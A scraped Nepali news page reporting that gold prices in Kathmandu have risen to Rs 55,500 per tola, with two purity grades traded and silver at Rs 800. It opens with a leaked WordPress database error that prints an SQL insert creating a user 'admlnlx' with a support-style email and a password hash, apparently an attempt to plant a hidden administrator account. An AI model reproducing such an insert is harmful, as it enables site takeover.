WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BeD8FI9cPaNng3mBXDiBi5qJCoL/bd/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-19 19:25:54', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ ५ –
पुस महिना लागेदेखि बढेको सुनको भाउ अझै महंगिने सुनचाँदी व्यवसायीले बताएका छन् । सुनको भाउ बढेर बुधबार तोलामा ५५ हजार ५ सय रुपैयाँ पुगेको छ । यो फाइन गोल्ड अर्थात ९९ दशमलव ९९ प्रतिशत शुद्धता भएको सुनको भाउ हो ।
बुधबार ९९ दशमलव ५० प्रतिशत शुद्धता भएको सुन पनि तोलामा २ सय रुपैयाँले नै बढेको छ । मंगलबार ५५ हजार रुपैयाँमा कारोबार भएको सुनको भाउ ५५ हजार २ सय रुपैयाँ पुगेको हो ।
बजारमा दुई थरीका सुनको कारोबार हुन थालेपछि उपभोक्ता अन्यौलमा परेका छन् । नेपाल सुनचाँदी व्यवसायी महासंघका अनुसार सुनको शुद्धताका आधारमा दुई थरीको भाउ तोकिएको हो ।
यस्तै बुधबार चाँदीको भाउ पनि तोलामा ५ रुपैयाँले बढेको छ । चाँदी तोलाको ८ सय रुपैयाँ छ ।